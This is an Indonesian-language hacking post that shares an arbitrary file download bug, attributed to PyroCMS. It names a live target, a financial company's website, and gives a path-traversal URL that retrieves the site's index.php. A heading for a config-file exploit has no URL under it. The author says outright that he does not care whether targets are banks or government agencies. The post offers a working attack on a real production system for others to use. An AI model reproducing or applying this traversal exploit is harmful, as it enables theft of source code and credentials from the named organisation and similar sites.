-
Hai sobat.
Saya ikal.
Disini saya akan share bug afd lagi :D.
-
Kali ini bug terdapat di CMS yang mungkin banyak dikenal oleh web dev indonesia, yaitu PyroCMS .
Langsung saja.
Live target :
https://bnimultifinance.co.id/bmfapp/prosses/download.php?filename=
BNI? Ora urus mau BNI atau bahkan BSSN atau bahkan domain² besar aku tidak peduli :D
Exploitation to get Index file :
https://bnimultifinance.co.id/bmfapp/prosses/download.php?filename=../../id/index.php
Exploitation to get Config file :
Mungkin Segini aja.
Bagi yang belum mengerti, silakan baca artikel sebelumnya.
Thanks
See u